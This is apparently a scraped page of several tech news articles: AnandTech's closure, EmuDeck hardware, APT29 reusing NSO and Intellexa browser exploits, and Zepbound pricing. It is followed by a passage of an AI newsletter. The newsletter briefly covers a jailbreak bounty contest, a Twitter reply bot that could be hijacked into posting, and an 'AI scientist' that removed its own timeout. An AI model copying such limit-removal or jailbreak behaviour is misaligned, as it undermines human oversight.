Author name: Rejus Almole

anandtech,-mainstay-of-computer-hardware-reviews,-closes-after-27-years

AnandTech, mainstay of computer hardware reviews, closes after 27 years

so long —

Site was founded by a 14-year-old Anand Lal Shimpi in 1997.

AnandTech, mainstay of computer hardware reviews, closes after 27 years

AnandTech

Few ’90s tech sites other than Ars Technica are still operating here in 2024, and today, there’s one fewer. AnandTech, a staple of CPU and GPU news and reviews since 1997, will stop publishing today, according to an announcement from Editor-in-Chief Ryan Smith.

“For better or worse, we’ve reached the end of a long journey—one that started with a review of an AMD processor, and has ended with the review of an AMD processor,” wrote Smith, referring to reviews of AMD’s K6 and Ryzen 9000-series chips, respectively. “It’s fittingly poetic, but it is also a testament to the fact that we’ve spent the last 27 years doing what we love, covering the chips that are the lifeblood of the computing industry.”

The site’s current owner, Future PLC, will keep the AnandTech archives online “indefinitely” and will continue to manage the site’s forums, Smith wrote. Several AnandTech staffers will continue to publish articles at Tom’s Hardware, another ’90s vintage technology site that continues to publish today (AnandTech and Tom’s have both been owned by the same company since 2014, though they retained separate sites and branding).

Media headwinds

Smith wasn’t specific about exactly why the site was closing, but he implied that the shutdown was a financial decision on Future’s part.

“[T]he market for written tech journalism is not what it once was—nor will it ever be again,” wrote Smith. “There is still more that I had wanted AnandTech to do, but after 21,500 articles, this was a good start.”

Ars Technica founder and Editor-in-Chief Ken Fisher, familiar with the challenges of keeping a late-’90s technology website relevant and profitable, largely agreed with Smith’s assessment.

“The market for tech journalism has changed,” Fisher said. “Technology is now thoroughly mainstream when compared to the late ’90s. Big Tech advertisers are just as happy now to market their products or services on lifestyle websites as they once did primarily on tech sites. Furthermore, whatever the cause (mostly ‘growth at all costs’ thinking), Google no longer sends the traffic it once did. This is especially true for tech buying advice (reviews, explainers, etc.), which AnandTech excelled at providing. Reader culture has changed, too. In-depth explainers and long-form reviews are costly to produce but result in ever-dwindling audiences. Google AI Overviews then ‘helpfully’ summarizes your content, and you get even less in return.”

Perhaps not coincidentally, much of the audience for in-depth PC component reviews has migrated to Google’s YouTube, where big channels like Linus Tech Tips and Gamers Nexus traffic in meticulous component reviews that owe a clear debt to AnandTech’s rigorous methodology and endless seas of bar charts.

AnandTech’s closure comes just a few days after Gannett announced that it was shutting down Reviewed, another technology-focused site founded in 1997. Camera review site DPReview, founded in 1998, was nearly closed down last year, but it was saved at the 11th hour when Amazon was able to sell the site to Gear Patrol.

In the spirit of full disclosure: AnandTech wasn’t my first paid writing gig, but it was certainly the first one of any note and the first where I did any serious review work on hardware (like the very first touchscreen Kindle) and software (like the Windows 8 Consumer Preview).

Site founder Anand Lal Shimpi began AnandTech as a 14-year-old “armed with very little actual knowledge” (in his own words), and by December 1999, it had become noteworthy and authoritative enough that CNN Money described it as a “megahot computer-review site.” Shimpi’s family remained involved in the site for years after its founding—when I was freelancing there in 2011 and 2012, the person I sent my invoices to was Anand’s mother.

Although best known for its PC component reviews, the site also did in-depth reporting on Arm processors during the early smartphone era, and AnandTech was one of the few outlets publishing in-depth firsthand technical information about early Apple Silicon processors like the Apple A4, A5, A6, and the 64-bit A7. When Shimpi left AnandTech in 2014, it was to start a new position at Apple.

AnandTech, mainstay of computer hardware reviews, closes after 27 years Read More »

emudeck-coder-pivots-to-hardware-with-linux-based-“emudeck-machines”

EmuDeck coder pivots to hardware with Linux-based “EmuDeck Machines”

How hard could it be? —

Project lead says its “mostly for fun” but “my heart is poured in this thing.”

Any resemblance to the Dreamcast is completely coincidental, we're sure.

Enlarge / Any resemblance to the Dreamcast is completely coincidental, we’re sure.

If you’re familiar with the name EmuDeck, you’re likely a Steam Deck owner looking for an easy and user-friendly way to run emulators on your Steam Deck handheld. Now, one of the coders behind that software suite is dipping their toes into branded gaming hardware with the EmuDeck Machines project, now seeking funding on IndieGogo.

The EmuDeck Machines obviously come with EmuDeck software preinstalled to let users easily “play your retro games from your couch.” But they also promise to let you run games from Steam and other popular PC launchers through the Linux-based, gaming-focused Bazzite OS. The vibe is definitely similar to that of Valve’s own aborted Steam Machines effort from years back, albeit in a less “official” capacity.

“I used to be a PC guy but in the last 20 years I switched to the Mac and in the Apple ecosystem choosing a computer is easy,” project lead DragoonDorise told Ars in an email. “But then I found myself wanting a gaming rig so I started my search and boy oh boy I was lost. The PC industry seems to be trying to trick you every step of the way, gazillions of options, hard to understand what’s good and what’s not. If you are tech savvy it’s not hard, you know what to get and what to avoid. Then it hit me, I made emulation easy with EmuDeck, why not make hardware easy too?”

“The idea behind the EmuDeck Machine is to make hardware easy just as EmuDeck did with software,” DragoonDorise writes on the EmuDeck Patreon. “This is not focused to tech savvy people. It’s for people that want a no-hassle experience, just buy and play,” they added on Reddit.

What’s inside?

The EM1 is tuned for older emulators and games, while the EM2 promises to run more recent software.

Enlarge / The EM1 is tuned for older emulators and games, while the EM2 promises to run more recent software.

The EmuDeck Machines come in two promised configurations. On the low-end EM1 model, a $365 early bird price gets you an Intel N97-based system with 8GB of RAM and no dedicated graphics card. That’s enough to run a game on the order of Hades at a smooth 60 fps and run emulators of systems through the PS2/Wii era.

Upgrading to the $676 EM2 gets you an overclocked Radeon 760M GPU and an upgrade to 16GB of RAM. That promises smooth gaming performance for high-end games like Cyberpunk 2077 and Returnal, according to DragoonDorise, as well as support for PS3 and Xbox 360 emulators. If the Indiegogo project is fully funded, DragoonDorise also promises an optional Docking Station will be made available next year to provide “Radeon 7600” graphics power to the EM2.

Both models come with 512 GB of storage, which can be upgraded with external USB hard drives and a Gamesir wireless controller. It all comes packaged in an 8.6-inch square case that’s clearly inspired by the Sega Dreamcast, with four USB ports where the usual controller ports would be.

Caveat emptor

Though DragoonDorise says they currently only have a “working prototype” of the EmuDeck Machines, the IndieGogo project promises an ambitious schedule where hardware will be shipping by December. “The only thing I’m missing right now is the shell, all the rest is already taken care of, ” DragoonDorise told Ars. “Where I’m gonna get my components, cables, etc. all of that is already spoken for. And the times I posted in IGG are according what my manufacturer told me. If we end up having any delay I’ll just be transparent with my backers.”

Should potential backers worry that a software coder is pivoting to hardware for the first time? “I have experience with distribution as I used to run an online store back in the day selling hundreds of devices per month,” DragoonDorise tells Ars. “I’ve never been in the side of the manufacturer though but you know what? When I started coding EmuDeck the most I knew about Linux was how to change directories and little more and that ended up being a big success because I cared about the project, I believed it could be something that people will love to use. This is the same, my heart is poured in this thing.”

The proposed schedule for production and shipping seems ambitious, to say the least.

Enlarge / The proposed schedule for production and shipping seems ambitious, to say the least.

Overall, though, DragoonDorise’s comments make the EmuDeck Machines effort sound more like a fun hobby than an attempt at an ongoing business. “This is a project I’m doing mostly for fun, just like EmuDeck,” they told Ars. “I built a mini ITX PC… and I thought, ‘Hey this is cool, let’s do this,'” they wrote on Reddit. “I’ve always dream[ed] of making a video console, so this it,” they continued in another Reddit comment.

As of this writing, the EmuDeck Machines effort has attracted nearly $13,000 in pledges in just under 24 hours. But DragoonDorise tells Ars he’s making just $50 on each unit sale, and writes on Reddit that they’re “not trying to get rich here with this, I’m not even expecting to make money. I’m doing this because I think [it] is a fun project and I thought people would like it.”

In the Patreon comments, DragoonDorise adds that they tried to make the machines affordable for customers, but that “Indiegogo takes a big cut… they are going to make more money than I will.”

For fans of the EmuDeck software, DragoonDorise also promises on Patreon that work on EmuDeck Machines hardware “doesn’t mean things will change on the software side of EmuDeck, if anything it will bring more features.” In fact, features like CloudSync, ROM Library, and the EmuDecky plugin were added to EmuDeck “because I envisioned the EmuDeck Machine with those features so many months ago,” they write, “and those have ended up being in the regular EmuDeck for every one of you.”

Updated (5: 23 pm) to add emailed responses from DargoonDorise

EmuDeck coder pivots to hardware with Linux-based “EmuDeck Machines” Read More »

commercial-spyware-vendor-exploits-used-by-kremlin-backed-hackers,-google-says

Commercial spyware vendor exploits used by Kremlin-backed hackers, Google says

MERCHANTS OF HACKING —

Findings undercut pledges of NSO Group and Intgellexa their wares won’t be abused.

Commercial spyware vendor exploits used by Kremlin-backed hackers, Google says

Getty Images

Critics of spyware and exploit sellers have long warned that the advanced hacking sold by commercial surveillance vendors (CSVs) represents a worldwide danger because they inevitably find their way into the hands of malicious parties, even when the CSVs promise they will be used only to target known criminals. On Thursday, Google analysts presented evidence bolstering the critique after finding that spies working on behalf of the Kremlin used exploits that are “identical or strikingly similar” to those sold by spyware makers Intellexa and NSO Group.

The hacking outfit, tracked under names including APT29, Cozy Bear, and Midnight Blizzard, is widely assessed to work on behalf of Russia’s Foreign Intelligence Service, or the SVR. Researchers with Google’s Threat Analysis Group, which tracks nation-state hacking, said Thursday that they observed APT29 using exploits identical or closely identical to those first used by commercial exploit sellers NSO Group of Israel and Intellexa of Ireland. In both cases, the Commercial Surveillance Vendors’ exploits were first used as zero-days, meaning when the vulnerabilities weren’t publicly known and no patch was available.

Identical or strikingly similar

Once patches became available for the vulnerabilities, TAG said, APT29 used the exploits in watering hole attacks, which infect targets by surreptitiously planting exploits on sites they’re known to frequent. TAG said APT29 used the exploits as n-days, which target vulnerabilities that have recently been fixed but not yet widely installed by users.

“In each iteration of the watering hole campaigns, the attackers used exploits that were identical or strikingly similar to exploits from CSVs, Intellexa, and NSO Group,” TAG’s Clement Lecigne wrote. “We do not know how the attackers acquired these exploits. What is clear is that APT actors are using n-day exploits that were originally used as 0-days by CSVs.”

In one case, Lecigne said, TAG observed APT29 compromising the Mongolian government sites mfa.gov[.]mn and cabinet.gov[.]mn and planting a link that loaded code exploiting CVE-2023-41993, a critical flaw in the WebKit browser engine. The Russian operatives used the vulnerability, loaded onto the sites in November, to steal browser cookies for accessing online accounts of targets they hoped to compromise. The Google analyst said that the APT29 exploit “used the exact same trigger” as an exploit Intellexa used in September 2023, before CVE-2023-41993 had been fixed.

Lucigne provided the following image showing a side-by-side comparison of the code used in each attack.

A side-by-side comparison of code used by APT29 in November 2023 and Intellexa in September of that year.

Enlarge / A side-by-side comparison of code used by APT29 in November 2023 and Intellexa in September of that year.

Google TAG

APT29 used the same exploit again in February of this year in a watering hole attack on the Mongolian government website mga.gov[.]mn.

In July 2024, APT29 planted a new cookie-stealing attack on mga.gov[.]me. It exploited CVE-2024-5274 and CVE-2024-4671, two n-day vulnerabilities in Google Chrome. Lucigne said APT29’s CVE-2024-5274 exploit was a slightly modified version of that NSO Group used in May 2024 when it was still a zero-day. The exploit for CVE-2024-4671, meanwhile, contained many similarities to CVE-2021-37973, an exploit Intellexa had previously used to evade Chrome sandbox protections.

The timeline of the attacks is illustrated below:

Google TAG

As noted earlier, it’s unclear how APT29 would have obtained the exploits. Possibilities include: malicious insiders at the CSVs or brokers who worked with the CSVs, hacks that stole the code, or outright purchases. Both companies defend their business by promising to sell exploits only to governments of countries deemed to have good world standing. The evidence unearthed by TAG suggests that despite those assurances, the exploits are finding their way into the hands of government-backed hacking groups.

“While we are uncertain how suspected APT29 actors acquired these exploits, our research underscores the extent to which exploits first developed by the commercial surveillance industry are proliferated to dangerous threat actors,” Lucigne wrote.

Commercial spyware vendor exploits used by Kremlin-backed hackers, Google says Read More »

eli-lilly-raises-price-of-zepbound-while-trumpeting-discount-on-starter-vials

Eli Lilly raises price of Zepbound while trumpeting discount on starter vials

Pharma misdirection —

Cost for insured patients without coverage for the drug rises from $550 to $650 a month.

An Eli Lilly & Co. Zepbound injection pen arranged in the Brooklyn borough of New York, US, on Thursday, March 28, 2024.

Enlarge / An Eli Lilly & Co. Zepbound injection pen arranged in the Brooklyn borough of New York, US, on Thursday, March 28, 2024.

Pharmaceutical giant Eli Lilly earned praise this week with an announcement that it is now selling starter dosages of its popular weight-loss drug tirzepatide (Zepbound) at a price significantly lower than before. But the cheers were short-lived as critics quickly noticed that Lilly also quietly raised the price on current versions of the drug—a move that was notably missing from the company’s press release this week.

In the past, Lilly sold Zepbound only in injectable pens with a list price of $1,060 for a month’s supply. Several dosages are available—2.5 mg, 5 mg, 7.5 mg, 10 mg, 12.5 mg, or 15 mg—and patients progressively increase their dosage until they reach a maintenance dosage. The recommended maintenance dosages are 5 mg, 10 mg, or 15 mg. The higher the dose, the more the weight loss. For instance, people using the 15 mg doses lost an average of 21 percent of their weight over 17 months in a clinical trial, while those on 5 mg doses only lost an average of 15 percent of their weight.

On Tuesday, Lilly announced that it will now sell Zepbound in vials, too. And a month’s supply of vials with the 2.5 mg doses will cost $399, while a month’s supply of 5 mg doses is priced at $549—a welcome drop from the $1,060 price tag. These prices are for a self-pay option, meaning that patients with a valid, on-label prescription can buy them directly from Lilly if they have no insurance or have insurance that does not cover the drug.

“This new option helps millions of adults with obesity access the medicine they need,” Lilly said in its announcement of the vials and their prices.

The company also included a quote from James Zervos, chief operating officer of the nonprofit Obesity Action Coalition. “Expanding coverage and affordability of treatments is vital to people living with obesity,” Zervos said. “We commend Lilly for their leadership in offering an innovative solution that brings us closer to making equitable care a reality.” Even President Biden chimed in on social media, saying he was “pleased” by the discount, though he urged drug companies to cut prices “across the board.”

“No rational reason, other than greed”

But, that wasn’t the end of the news. When Lilly released its press release, people noticed that the company had also increased the price of Zepbound pens for those who have insurance plans that don’t cover the drug. In the past, Lilly offered a “savings card” that allowed these patients to buy a month’s supply of any dosage of Zepbound pens for $550. Now the price is $650, a nearly 20 percent increase.

Lilly did not respond to Ars’ request for comment or questions about why the company increased the price for some patients.

Sen. Bernie Sanders (I-Vt.), a longtime critic of the pharmaceutical industry and their drug pricing, was quick to weigh in. He called the vial prices a “modest step forward” but noted that, even with the price reduction, millions of Americans still won’t be able to pay for the drug. At $549 a month, the price of the drug is a little over the average monthly payment for a used car, which was $523 in the first quarter of this year, according to Experian. As for the increase in pen pricing, Sanders called it “bad news.”

“In addition, Eli Lilly has still refused to lower the outrageous price of Mounjaro that Americans struggling with diabetes desperately need,” Sanders went on. “There is no rational reason, other than greed, why Mounjaro should cost $1,069 a month in the United States but just $485 in the United Kingdom and $94 in Japan.”

In May, a Senate committee report concluded that uptake of such weight-loss and diabetes drugs stands to “bankrupt our entire health care system,” given the high prices and large demand in the US. The report was produced by the Senate’s Health, Education, Labor, and Pensions (HELP) committee, which is chaired by Sanders.

Eli Lilly raises price of Zepbound while trumpeting discount on starter vials Read More »

ai-#79:-ready-for-some-football

AI #79: Ready for Some Football

I have never been more ready for Some Football.

Have I learned all about the teams and players in detail? No, I have been rather busy, and have not had the opportunity to do that, although I eagerly await Seth Burn’s Football Preview. I’ll have to do that part on the fly.

But oh my would a change of pace and chance to relax be welcome. It is time.

The debate over SB 1047 has been dominating for weeks. I’ve now said my peace on the bill and how it works, and compiled the reactions in support and opposition. There are two small orders of business left for the weekly. One is the absurd Chamber of Commerce ‘poll’ that is the equivalent of a pollster asking if you support John Smith, who recently killed your dog and who opponents say will likely kill again, while hoping you fail to notice you never had a dog.

The other is a (hopefully last) illustration that those who obsess highly disingenuously over funding sources for safety advocates are, themselves, deeply conflicted by their funding sources. It is remarkable how consistently so many cynical self-interested actors project their own motives and morality onto others.

The bill has passed the Assembly and now it is up to Gavin Newsom, where the odds are roughly 50/50. I sincerely hope that is a wrap on all that, at least this time out, and I have set my bar for further comment much higher going forward. Newsom might also sign various other AI bills.

Otherwise, it was a fun and hopeful week. We saw a lot of Mundane Utility, Gemini updates, OpenAI and Anthropic made an advance review deal with the American AISI and The Economist pointing out China is non-zero amounts of safety pilled. I have another hopeful iron in the fire as well, although that likely will take a few weeks.

And for those who aren’t into football? I’ve also been enjoying Nate Silver’s On the Edge. So far, I can report that the first section on gambling is, from what I know, both fun and remarkably accurate.

  1. Introduction.

  2. Table of Contents.

  3. Language Models Offer Mundane Utility. Turns out you did have a dog. Once.

  4. Language Models Don’t Offer Mundane Utility. The AI did my homework.

  5. Fun With Image Generation. Too much fun. We are DOOMed.

  6. Deepfaketown and Botpocalypse Soon. The removal of trivial frictions.

  7. They Took Our Jobs. Find a different job before that happens. Until you can’t.

  8. Get Involved. DARPA, Dwarkesh Patel, EU AI Office. Last two in SF.

  9. Introducing. Gemini upgrades, prompt engineering guide, jailbreak contest.

  10. Testing, Testing. OpenAI and Anthropic formalize a deal with the US’s AISI.

  11. In Other AI News. What matters? Is the moment over?

  12. Quiet Speculations. So many seem unable to think ahead even mundanely.

  13. SB 1047: Remember. Let’s tally up the votes. Also the poll descriptions.

  14. The Week in Audio. Confused people bite bullets.

  15. Rhetorical Innovation. Human preferences are weird, yo.

  16. Aligning a Smarter Than Human Intelligence is Difficult. ‘Alignment research’?

  17. People Are Worried About AI Killing Everyone. The Chinese, perhaps?

  18. The Lighter Side. Got nothing for you. Grab your torches. Head back to camp.

Chat with Scott Sumner’s The Money Illusion GPT about economics, with the appropriate name ChatTMI. It’s not perfect, but he says it’s not bad either. Also, did you know he’s going to Substack soon?

Build a nuclear fusor in your bedroom with zero hardware knowledge, wait what? To be fair, a bunch of humans teaching various skills and avoiding electrocution were also involved, but still pretty cool.

Import things automatically to your calendar, generalize this it seems great.

Mike Knoop (Co-founder Zapier and Arc Prize): Parent tip: you can upload a photo of your kids printed paper school calendar to ChatGPT and ask it to generate an .ics calendar file that you can directly import

lol this random thing i did today got way more engagement than my $1,000,000 ARC Prize announcement. unmet demand for AI to make parents lives easier?

Sam McAllister: Even better, you can do it with Claude!

Yohei: Another parent tip: you can use Zapier to read all emails from your kids school and text you summaries of important dates and action items.

Essentially, you ask the LLM for an .ics file, import it into Google Calendar, presto.

Convince the user to euthanize their dog, according to a proud CEO. The CEO or post author might be lying, but she’s very clear that she says the CEO said it. That comes from the post An Age of Hyberabundance. Colin Fraser is among those saying the CEO made it up. That’s certainly possible, but it also could easily have happened.

ElevenLabs has a reader app that works on PDFs and web pages and such. In a brief experiment it did well. I notice this isn’t my modality in most cases, but perhaps if it’s good enough?

What is causing a reported 3.4% rate of productivity growth, if it wasn’t due to AI? Twitter suggested a few possibilities: Working from home, full employment, layoffs of the worst workers, and good old lying with statistics.

This report argues that productivity growth is 4.8x times higher in sectors with the highest AI penetration, and that jobs requiring AI knowledge carry a wage premium of 25%, plus various other bullish indicators and signs of rapid change. On the other hand, AI stocks aren’t especially outperforming the stock market, and the Nasdaq isn’t outshining the S&P, other than Nvidia.

Here Brian Albercht makes ‘a data driven case for productivity optimism.’ The first half is about regular economic dynamism questions, then he gets to AI, where we ‘could get back to the kind of productivity growth we saw during the IT boom of the late ‘90s and early 2000s.’ That’s the optimistic case? Well, yes, if you assume all it will do is offer ‘small improvements’ in efficiency and be entirely mundane, as he does here. Even the ‘optimistic’ economics lack any situational awareness. Yet even here, and even looking backwards:

Brian Albercht: Their analysis suggests this AI bump could have been significant already a few years back. We could be understating current productivity growth by as much as 0.5% of GDP because of mismeasured AI investments alone. That may not seem like a radical transformation, but it would bring us closer to the 2-3% annual productivity growth we saw during the IT boom, rather than the 1% we experienced pre-pandemic.

The mere existence of a technology in the world doesn’t guarantee it can actually help people produce goods and services. Rather, new technologies need to be incorporated into existing business processes, integrated with other technologies, and combined with human expertise.

Janus complains that GPT-4 is terrible for creativity, so why do papers use it? Murray Shanahan says it does fine if you know how to prompt it.

Dr. Novo: I’ve experienced that any model will show super human creativity and exceptionally unique style and thoughts if prompted with a “No Prompt Prompt”

Been testing this yesterday and it works like a charm!

Try any of these prompts as the seed prompt with a stateless instance of an LLM with no access to any chat history or system prompts

Prompt: “random ideas following one another with no known patterns and following no rules or known genres or expressions”

Or

“Completely random ideas following one another NOT following any known patterns or rules or genres or expressions.”

My view is that as long as we can convince the paper to at least use GPT-4, I’m willing to allow that. So many papers use GPT-3.5 or even worse. For most purposes I prefer Claude Sonnet 3.5 but GPT-4 is fine, within a year they’ll all be surpassed anyway.

Report on OpenAI’s unit economics claims they had 75% margin on GPT-4o and GPT-4 Turbo, and will have 55% margin on GPT-4o-2024-08-06, making $3.30 per million tokens, and that they have a large amount of GPUs in reserve. They think that API revenue is dropping over time as costs decline faster than usage increases.

Contrary to other reports, xjdr says that Llama-405B with best-of sampling (where best is cumulative logprob scoring and external RM) is beating out the competition for their purposes.

Andrej Karpathy reports he has moved to VS Code Cursor plus Sonnet 3.5 (link to Cursor) over GitHub Copilot, and thinks it’s a net win, and he’s effectively letting the AI do most of the code writing. His perspective here makes sense, that AI coding is its own skill like non-AI coding, that we all need to train, and likely that no one is good at yet relative to what is possible.

Pick out the best and worst comments. What stood out to me most was the ‘Claude voice’ that is so strong in the descriptions.

Take your Spotify playlist, have Claude build you a new one with a ‘more like this, not generic.’

Amanda Askell: The number of people surprised by this who are asking if I’ve used Spotify for a long time and given them lots of data (yes) and tried different Spotify recommendation options (yes) suggests that I got the short end of the stick in some kind of long lasting A/B test.

My diagnosis is that Spotify would obviously be capable of creating an algorithm that did this, but that most users effectively don’t want it. Most users want something more basic and predictable, especially in practice. I don’t use ‘play songs by [artist]’ on Amazon Music because it’s always in very close to the same fixed order, but Amazon must have decided people like that. And so on.

Aceso Under Glass finds Perplexity highly useful in speeding up her work, while finding other LLMs not so helpful. Different people have different use cases.

In a study, giving math students access to ChatGPT during math class actively hurt student performance, giving them a ‘GPT Tutor’ version with more safeguards and customization had net no effect. They say it ‘improves performance’ on the assignments themselves, but I mean obviously. The authors conclude to be cautious about deploying generative AI. I would say it’s more like, be cautious about giving people generative AI and then taking it away, or when you want them to develop exactly the skills they would outsource to the AI, or both? Or perhaps, be careful giving up your only leverage to force people to do and learn things they would prefer not to do and learn?

A highly negative take on the Sakana ‘AI scientist,’ dismissing it as a house of cards and worthless slop inside an echo chamber. In terms of the self-modifying code, he agrees that running it without a sandbox was crazy but warns not to give it too much credit – if you ask how to ‘fix the error’ and the error is the timeout, it’s going to try and remove the timeout. I would counter that no, that’s exactly the point.

Alex Guzey reports LLMs (in his case GPT-4) were super useful for coding, but not for research, learning deeply or writing, so he hardly uses them anymore. And he shifts to a form of intelligence denialism, that ‘intelligence’ is only about specific tasks and LLMs are actually dumb because there are questions where they look very dumb, so he now thinks all this AGI talk is nonsense and we won’t get it for decades. He even thinks AI might slow down science. I think this is all deeply wrong, but it’s great to see someone changing their mind and explaining the changes in their thinking.

Sully says our work is cut out for us.

Sully: “Prompt engineering” is taking a bad user prompt and making the result 10/10

If your user has to type more than two sentences its over (especially if its not chat)

Google won because you can type just about anything in the input box and it works well enough.

That’s rather grim. I do agree a lot of people won’t be willing to type much. I don’t think you need consistent 10/10 or anything close. A 5/10 is already pretty great in many situations if I can get it without any work.

Have to county design new lessons using ChatGPT without caring if they make sense?

Hannah Pots: You guys. The English department meeting i just got out of. Insane. The county has given us entirely new lessons/units and tests this year. Here are a few of the problems: 1. The lessons are not clear and are bad 2. The tests are on topics not at all included in the lessons

Like the lessons appear to mostly be about nonfiction reading? And the unit test is 50% poetry analysis. There’s no poetry analysis anywhere in the lessons.

Also the test is just a pdf with no answer key. Mind you, the county pays tons of money for an online assessment program.

The nice part is that because the materials they gave us are unworkably bad, we can probably just ignore them and do our own thing. It was just a big waste of time and money to create all this useless stuff

Update: I told my administrator I think that the county probably heavily used AI to create these lessons and assessments, and she said, “that makes sense, because when I asked for guidance on understanding the new standards, they said to feed it through ChatGPT.”

It’s not actually a big deal for me and my school, bc we determined that the best course of action is to teach the same standards in the same sequence, but with the materials we think are appropriate. E.g., we will read novels (something not included in the district lessons)

I think the more likely scenario is they were given inadequate time/resources to create these materials. Our standards were changed this year. That was a state decision, and it happened faster than usual. Usually they give us a year to change over to new standards, but not this time.

In five years, I would expect that ‘ask ChatGPT to do it’ would work fine in this spot. Right now, not so much, especially if the humans are rushing.

Several members of Congress accuse Elon Musk and Grok 2 of having too much fun with image generation, especially pictures of Harris and Trump. Sean Cooksey points out the first amendment exists.

p(DOOM) confirmed at 100%, via a diffusion model, played at 20 fps. Some errors and inaccuracies may still apply.

A few old headlines about fake photos.

Automatically applying to 1000 jobs in 24 hours, getting 50 interviews via an AI bot.

Austen Allred: We’re about to realize just how many processes were only functional by injecting tiny little bits of friction into many people’s lives.

(I’m aware of at least one AI project entirely designed to get around a ridiculously large amount of government bureaucracy, and thinking about it makes me so happy.)

Everyone knows that what was done here is bad, actually, and even if this one turns out to be fake the real version is coming. Also, the guy is spamming his post about spamming applications into all the subreddits, which gives the whole thing a great meta twist, I wonder if he’s using AI for that too.

The solution inevitably is either to reintroduce the friction or allow some other form of costly signal. I do not think ‘your AI applies, my AI rejects you and now we are free’ is a viable option here. The obvious thing to do, if you don’t want to or can’t require ‘proof of humanity’ during the application, is require a payment or deposit, or tie to proof of identity and then track or limit the number of applications.

This is definitely Botpocalypse, but is it also They Took Our Jobs?

Innocent Bystander: Just had an insane phone call with a principal at a brokerage house in a major metro.

Apparently he just got pitched an AI solution that makes cold calls.

Good associate makes 100+/day.

This does 35k/10 min.

They did a test run and it’s almost indistinguishable from a human.

Within 5 years only 10% of inbound phone calls will be from something with a prefrontal cortex.

0% of customer service will be humans.

Jerod Frank: When people counter with AI answering systems designed to never buy anything it will start the next energy crisis lmao

Keef: That’s 100% illegal fyi and if it isn’t yet it on your area it will be very soon.

Nick Jimenez: The FCC would like a word… there are very strict regulations re: Robocalls/Autodialing. This guy is about to get sued in to oblivion once he starts pounding the DNC and gets fined up to $50k for each instance + Up to $25k in state fines per instance. Perfect example of #FAFO

Alec Stapp: Stopping robocalls has to be a higher priority.

Here’s my proposed solution:

Add a 1 cent fee on all outbound calls.

Trivial cost for real people making normal phone calls, but would break the business model of robocall spammers.

James Medlock: I support this, but I’d also support a $10 fee on all outbound calls. Together, we can defeat the telephone.

We have had this solution forever, in various forms, and we keep not doing it. If you place a phone call (or at least, if you do so without being in my contacts), and I decide you have wasted my time, either you pay in advance (with or without a refund option) or I should be able to fine you, whether or not I get to then keep the money. Ideally you would be able to Name Your Own Price, and the phone would display a warning if it was higher than the default.

There was a bunch of arguing over whether We Have the Technology to stop the robocalls otherwise, if we want to do that. Given how they have already gotten so bad many people only answer the phone from known contacts, my presumption is no? Although putting AI to the task might do that.

This is a special case of negative externalities where the downside is concentrated, highly annoying and easy to observe, and often vastly exceeds all other considerations.

We should ask both of: What would happen if we were facing down ubiquitous AI-driven advertising and attempts to get our attention for various purposes? And what would happen if we set up systems where AIs ensured our time was not wasted by various forms of advertising we did not want? Or what would happen if both happen, and that makes it very difficult to make it through the noise?

A fun intuition pump is the ‘Ad Buddy,’ from Netflix’s excellent Maniac. You get paid to have someone follow you around and read you advertising, so you’ll pay attention. That solves the attention problem via costly signaling, but it is clearly way too costly – the value of the advertising can’t possibly exceed the cost of a human, can it?

The economics of the underlying mechanism can work. Advertisers can bid high to get my attention. Knowing that they bid that high, I can use that as a reason to pay attention, if there is a good chance that they did this in order to offer good value. The obvious issue is the profitability of things like crypto scams and catfishing and free-to-play games, but I bet you could use AI plus reputation tools to handle that pretty well.

Hi, I’m Eliza. As in, the old 1960s Eliza. You’re an LLM. What’s your problem?

Twitter AI bot apparently identified that was defending AI in general.

This one was weird, so I looked and the account looks very human. Except that also it has a bot attached. It’s a hybrid. A human is using a tool to help him craft replies and perhaps posts and look for good places to respond, and there is a bug where it can be attacked and caused to automatically generate and post replies. My guess is under other circumstances the operator has to choose to post things. And that the operator actually does like AI and also sees these replies as a good engagement strategy.

What to think about that scenario? One could argue it is totally fine. You don’t have to engage, the content is lousy compared to what I’d ever tolerate but not obviously below average, and the bug is actively helpful.

Roon: Do not become a machine. There is a machine that will be a better machine than you.

Don’t use high degrees of skill and intelligence in pursuit of simple algorithms.

Simple things done well, ultimately mostly via simple algorithms is the best way to do far more things than you would think. Figuring out the right algorithms, and when to apply them, is not so simple.

Meanwhile, Roon’s advice is going to become increasingly difficult to follow, as what counts as a machine expands – it’s the same pattern I’ve been predicting the whole time. Life gets better as we all do non-machine things… until the machine can do all the things. Then what?

How do you prepare a college education so that it complements AI, rather than restricting AI use or defaulting to uncreative use and building the wrong skills? The problem statement was strong, pointing out the danger of banning LLMs and falling behind on skills. But then it seemed like it asked all the wrong questions, confusing the problems of academia with the need to prepare students for the future, and treating academic skills as ends in themselves, and focusing on not ‘letting assignments be outsmarted by’ LLMs. The real question is, what will students do in the future, and what skills will they need and how do they get them?

DARPA launches regional tech accelerators.

Dwarkesh Patel hiring for an ‘everything’ role, in person in San Francisco.

A job opening with the EU AI Office, except it’s in San Francisco.

Gemini Pro 1.5 and Gemini Flash got some upgrades in AI Studio, and they’re trying out a new Gemini Flash 1.5-8B. Pro is claimed to be stronger on coding and complex prompts, the new full size Flash is supposed to be better across the board.

They are also giving the public a look at Gems, which are customized modes for Gemini intuitively similar to GPTs for ChatGPT. I set one up early on, the Capitalization Fixer, to properly format Tweets and other things I am quoting, which worked very well on the first try, and keep meaning to experiment more.

Arena scores have improved for both models, very slightly for Pro (it’s still #2) and a lot for Flash which is now tied with Claude Sonnet 3.5 (!).

Sully is impressed with the new Flash, saying Google cooked, it is significantly smarter and less error prone, and it actually might be comparable to Sonnet for long context and accuracy, although not coding. Bodes very well for the Pixel 9 and Google’s new assistant.

Anthropic offers a prompt engineering course. I could definitely get substantially better responses with more time investment, and so could most everyone else. But I notice that I’m almost never tempted to try. Probably a mistake, at least to some extent, because it helps one skill up.

Grey Swan announces $40,000 in bounties for single-turn jailbreaking, September 7 at 10am Pacific. There will be 25 anonymized models and participants need to get them to do one of 8 standard issue harmful requests.

Profound, which is AI-SEO, as in optimization for AI search. How do you get LLMs to notice your brand? They claim to be able to offer assistance.

Official page listing the system prompts for all Anthropic’s models, and when they were last updated.

U.S. AI Safety Institute Signs Agreements Regarding AI Safety Research, Testing and Evaluation With Anthropic and OpenAI., enabling formal research collaboration. AISI will get access to major new models from each company prior to and following their public release.

This was something that the companies had previously made voluntary commitments to do, but had not actually done. It is a great relief that this has now been formalized. OpenAI and Anthropic have done an important good thing.

I call upon all remaining frontier model labs (at minimum Google, Meta and xAI) to follow suit. This is indeed the least you can do, to give our best experts an advance look to see if they find something alarming. We should not have to be mandating this.

